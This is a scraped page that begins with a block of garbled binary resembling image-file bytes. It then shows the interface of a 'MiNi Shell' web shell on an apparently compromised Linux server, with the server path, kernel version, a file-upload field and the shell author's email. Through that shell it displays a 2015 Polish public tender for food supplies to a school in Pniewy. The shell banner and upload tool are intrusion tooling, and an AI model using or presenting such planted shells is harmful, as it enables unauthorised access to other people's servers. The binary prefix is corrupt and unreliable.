JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/334608-N-2015.html

<p class="kh_header"><b>Pniewy: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E.SCZANIECKIEJ W PNIEWACH</b><br>
<b>Numer ogłoszenia: 334608 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im.E.Sczanieckiej , ul. Wolności 10, 62-045 Pniewy, woj. wielkopolskie, tel. 61 2910607, faks 61 2911981.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zespolszkolpniewy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół im. E. Sczanieckiej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ IM. E.SCZANIECKIEJ W PNIEWACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> TABELA A WARZYWA ŚWIEŻE, OWOCE 
Banany  kg 580 bazylia doniczka  szt 30 Buraki kg 600 Brukselka kg 80 Brokuły od m-ca maja szt 200 Brzoskwinie kg 150 Cebula kg 620 Cytryna kg 60 Czosnek świeży siatka szt 43 Cukinia kg 10 Fasolka szparagowa żółta m-c czerwiec kg 70 Jabłka na kg kg 900 Gruszka m-c czerwiec kg 120 Kalafior świeży od m-ca maja szt 140 Kalarepa  szt 90 Kapusta biała  kg 800 Kapusta biała - młoda od 20 maja kg 300 Kapusta czerwona  kg 400 Kapusta włoska  szt 90 Kapusta pekińska- główka szt 160 Kiwi szt 790 Koper świeży  pęczek 960 Koper włoski fenkuł szt 30 Lubczyk doniczka szt 80 Marchew korzeń  kg 700 Mandarynka kg 70 Mieta doniczka szt 10 Nektarynka kg 60 Ogórki zielone świeże kg 250 Oregano -doniczka szt 20 Papryka czerwona świeża kg 70 Papryka żółta swieża kg 4 Pieczarki świeże kg 200 Pietruszka korzeń kg 240 Pomidory kg 150 Pomarańcza kg 80 Por  kg 240 Rzodkiewka  pęczek 40 Rozmaryn doniczka szt 20 Sałata zielona  szt 50 Sałata lodowa szt 30 Seler korzeń kg 400 Szczypiorek świeży  pęczek 200 Tymianek doniczka szt 30 Zielona pietruszka świeża  pęczek 700 Ziemniaki młode od 20.05.16 kg 3500 Ziemniaki jadalne  kg 8000  
TABELA B MIĘSO I PRZETWORY
Karkówka bk kg 350 Mielone wieprzowe kg 300 Łopatka wieprzowa bk zmielona  kg 550 Mięso gulaszowe krojone w kostkę  kg 420 Schab bk kg 840 Szynka bk kulka kg 50 Żeberka I klasa kg 250 Filet z kurczaka bez chrząstki świeży kg 650 Kurczak cały świeży kg 250 Filet z indyka kg 50 Skrzydła z indyka  kg 50 porcje rosołowe świeże kg 600 Udko z kurczaka świeże kg 500 Boczek parzony kg 160 Kieł. biała cieńka delikatesowa  86% mięsa kg 4 Kieł. typu farmerska kg 3 Kieł. typu kanapkowa kg 5 Kieł. typu słoikowa kg 6 Kieł. typu śląska 90 % mięsa kg 25 Kieł. typu zielonogórska kg 3 Kieł. typu zwyczajna kg 90 Kieł. typu żywiecka kg 8 Kieł. typu Wiejska kg 5 Kiełbaski pieprzowe  kg 10 Mielonka wieprz. kg 7 Mielonka zapiekana kg 7 Ogonówka parzona kg 15 Parówki cieńkie 85% mięsa kg 22 Polędwica typu sopocka kg 15 Polędwiczka wędzona kg 8 Polędwica staropolska  kg 10 Serdelki kg 15 Szynka bamberka 73 % mięsa kg 7 Szynka gotowana kg 18 Szynka bez wędzenia 74% mięsa kg 10 Szynka konserwowa kg 10 Szynka starowiejska kg 10 Szynka tyrolska kg 12 szynka wiejska kg 12 Szynka polska kg 10 Szynka pieczona 73 % mięsa kg 8 Szynka ze wsi 96,5% mięsa kg 5 Szynkowa wieprzowa kg 12 Szynka wędzona 99% mięsa kg 5 Szynka drobiowa 85% mięsa kg 15 Wędlina drobiowa kg 10 Łopatka pieczona - wędlina - mięso 73% kg 5 Smalec kg 10 Wątrobianka kg 5     

TABELA C   MROŻONKI RYBY MROŻONE 
Brokuły mrożone op 2 kg op 80 Brukselka mrożona  op2,5 kg op 70 Fasolka szparagowa cieta op 2,5 kg op 80 Fasolka żółta cała 2,5 kg  op 40 Groszek mrożony op2,5 kg op 50 Kalafior mrożony op 2 kg op 150 Makrela wędzona  kg 18 Marchew mrożona op2,5 kg op 110 Marchew z groszkiem mrożona op 2,5 kg op 100 Matias - śledź solony wiaderko 3 kg szt 35 Pyzy drożdżowe  op 9 szt szt 720 Wiśnie mrożone op 2,5 kg op 60 Truskawka mrożona op 2,5 kg op 10 Mieszanka kompotowa op2,5 kg  op 10 Ryba mrożona mintaj SHP kg 300 Ryba mrożona dorsz SHP kg 300 Ryba mrożona morszczuk SHP kg 300 Ryba mrożona miruna SHP kg 250 Szpinak mrożony op450 g szt 10 Włoszczyzna paski op 2,5 kg  op 190 Zupa wiosenna 8 składnikowa op 2,5 kg op 95                                                                                                                    


TABELA D PRZETWORY KONSERWOWE MĄCZNE PRZYPRAWY TŁUSZCZE JAJA  
Ananas puszka 580gr szt 90 Bazylia 10 g szt 20 Budyń bez cukru (śmietankowy, malinowy, czekoladowy) szt 18 Brzoskwinie w puszce  50 Cukier kryształ  op 1 kg kg 140 cukier puder 400g szt 6 Cukier waniliowy 32g szt 5 curry 30 g szt 15 Czekolada mleczna 100g  szt 40 cynamon 20 g szt 6 Czosnek mielony 20g szt 250 Chrzan tarty 160g typu victus szt 40 Drożdże 100g szt 12 Dżem  niskosłodzony 280 g bez dodatku syropu glukozowo-fruktozowego  szt 150 Estragon 10 g  15 Fasola Jaśopakowanie 500g szt 200 fasola czerwona puszka 400 g szt 30 Fasola drobna luz  kg 100 Fasola szparagowa konserwowa 720g szt 300 Groszek konserwowy 400g szt 20 Gałka muszkatołowa 15 g szt 2 Galaretka 75 g (truskawkowa, wiśniowa, pomarańczowa) szt 14 Groch połówki luz kg 120 Herbata granulowana czarna 100g szt 150 Herbata owocowa saga 25 torebek szt 30 Imbir 20 g szt 15 Jajka L szt 9000 Kakao extra ciemne  100g szt 25 Kapusta czerwona 0,9 l  szt 100 Kapusta kwaszona wiaderko 5 kg Wiaderko 140 Kasza wiejska 1000g szt 500 Kasza jaglana 400 g szt 225 Kasza gryczana niepalona 400 g szt 30 Kaszka manna 1kg kg 70 Kawa zbożowa  147 g typu anatol szt 25 Ketchup pikantny 205 g (190 g pomidorów na 100 g ketchupu) szt 150 Kisiel bez cukru 40 g szt 360 kminek 20 g szt 15 Ksylitol 250 g szt 6 Kolendra 10 g szt 4 Koncentrat pomidorowy 30% 950g typu pudliszki szt 240 Konserwa rybna - filet z makreli w pomidorach 170g szt 100 Kukurydza konserwowa 400g szt 150 Kurkuma 10 g szt 10 Liść laurowy 80g szt 30 Lubczyk 150 g szt 120 Majeranek 300 g  szt 70 Majonez dekoracyjny 700ml typu winiary szt 140 Makaron nitka rosołowa, świderki, 400g - 100% semolina z pszenicy durum szt 700 Makaron świderki z mąki wieloziarnistej 400 g szt 200 Makaron spagetti  muszelka, kolanko, nitka spagetti 500 g 100%semolina z pszenicy durum szt 500 Makaron lasagne  szt 6 Makaron kokardki szt 6 Makaron wstążki długie, pióra -400 g 100% semolina z pszenicy durum szt 6 Marmolada 550g szt 7 Mąka wrocławska pszenna TYP 500 op. 1kg kg 700 Mąka tortowa typ 450 op kg kg 10 Mąka orkiszowa typ 620 kg 50 Mąka ziemniaczana 1kg kg 30 Miód naturalny 1 l szt 90 Morela suszona 150g szt 14 Mus jabłkowy 720 g szt 60 Musztarda stołowa słoik 200g szt 80 Ocet jabłkowy 500ml szt 100 Ogórki konserwowe 900gr szt 250 Ogórki kwaszone wiaderko 3kg wiaderko 100 Oliwa butelka 5l typu kujawska szt 140 oregano 10g szt 30 Orzechy włoskie 100 g szt 30 Otręby owsiane 150 g szt 15 Papryka konserwowa 900ml szt 100 Papryka mielona ostra 20g szt 300 Papryka mielona słodka 20g szt 300 Proszek do pieczenia 16g szt 5 Pasztet drobiowy 135g profi szt 80 Pieprz mielony 100g szt 80 Płatki kukurydziane 250g typu corn flakes szt 90 Powidła węgierkowe 310g szt 70 Płatki owsiane górskie 0,5 kg szt 30 Przyprawa do kebabu 30 g szt 8 Przyprawa do szaszłyków 20 g szt 8 Pestki dyni 100 g szt 60 Ryż długoziarnisty biały opakowanie 1kg szt 400 Ryż naturalny 400 g szt 30 rodzynki 100g szt 90 Rozmaryn 150 g szt 10 Sezam 1 kg kg 80 Siemie lniane 100 g szt 5 Śliwki suszone 150 g szt 20 Słonecznik łuskany 100 g szt 90 sok 100 % bez dodatku cukru jabłkowy, malina-jabłko, multiwitamina, pomarańczowy, czarna porzeczka-  2 l karton 3000 Sól sodowo-potasowa 350 g szt 600 soda 60 g szt 5 Syrop owocowy wysokosłodzony butelka 1l butelka 40 Tymianek 150 g szt 10 Tuńczyk w oleju 170 g szt 60 Woda n/g 5 l szt 200 Zioła prowansalskie 10g szt 10 Zaprawa żurek 500ml szt 140 Ziele angielskie 15g szt 40

TABELA E PIECZYWO 
Bułka mała 50 g szt 1700 Bułka wieloziarnista 70 g szt 5300 Bułka hamburgerowa 50g szt 150 Bułka hot-dog 50g szt 120 Bułka tarta 0,5 kg szt 600 Chleb wieloziarnisty 500g -krojony szt 490 chleb 7 ziaren0,5 kg - krojony szt 150 Chleb zwykły 600g-krojony szt 510 Chleb żytni 0,35 kg - krojony szt 150 Chleb wiejski na maślance 0,9 kg - krojony szt 100 Kawiorek 350 g szt 30 Drożdżówki szt 1500 Babka  typu poznańska kg 3 Babka  w polewie kg 3                                                                                      

TABELA F NABIAŁ  
Jogurt owocowy  (zawartość cukru do 10 g100 g) szt 1400 jogurt naturalny 180g szt 1500 jogurt naturalnu 400 g typu grecki szt 50 Kefir 390 g szt 60 Maślanka typu mrągowska 1 l szt 30 Masło extra 250g zaw.tłuszcz.82% szt 1900 Masło klarowane 500g szt 5 Mleko 2% folia 1 l l 780 Mleko 2% karton  l 250 Ser smażony 200g szt 100 ser feta 270 g  szt 50 Ser typu almette 150 g szt 60 Ser kanapkowy 150 g szt 60 Sery żółte różne, zaw. tłuszcz. nie mniej niż 40%(  salami, gouda ) kg 120 Sery żółte różne, zaw. tłuszcz. nie mniej niż 40%( królewski, rolada wędzona ) kg 150 Śmietana słodka 18% 200ml szt 850 Śmietana kremówka 30%200ml szt 100 Śmietana zakwaszana 18% 200 ml szt 990 Gzik 200 g szt 150 Twarożek wiejski 200g szt 40 Twaróg extra śmietankowy mielony  kg 360 Twaróg wędzony zaw.tłuszcz.26% kg 10.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>ZAMAWIAJĄCY PRZEWIDUJE ZAMÓWIENIA UZUPEŁNIAJĄCE DO WYSOKOŚCI 20% ZAMÓWIENIA PODSTAWOWEGO</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.22.90.00-9, 15.00.00.00-8, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.81.10.00-6, 15.51.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o UDZIELENIE ZAMÓWIENIA MOGĄ UBIEGAĆ SIĘ WYKONAWCY KTÓRZY SPEŁNIAJĄ WARUNKI WYNIKAJĄCE Z ART.22 UST 1-3 USTAWY Z DNIA 29 STYCZNIA 2004 pzp ORAZ NIEPODLEGAJĄCY WYKLUCZENIU NA PODSTAWIE ART.24 UST 1-2 USTAWY, ZŁOŻĄ WYMAGANE I OPISANE W SIWZ OŚWIADCZENIA I DOKUMENTY.
ZAMAWIAJĄCY OCENI SPEŁNIENIE POWYŻSZYCH WYMAGAŃ POPRZEZ SZCZEGÓŁOWĄ ANALIZĘ DOKUMENTÓW ZŁOZONYCH PRZEZ WYKONAWCÓW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>OŚWIADCZENIE ZAŁĄCZNIK NR 2 DO SIWZ;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - TERMIN PŁATNOŚCI - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zespolszkolpniewy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Pniewach
ul. Wolności 10
62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 14:00, miejsce: Zespół Szkół w Pniewach (sekretariat)
ul. Wolności 10
62-045 Pniewy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.06.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com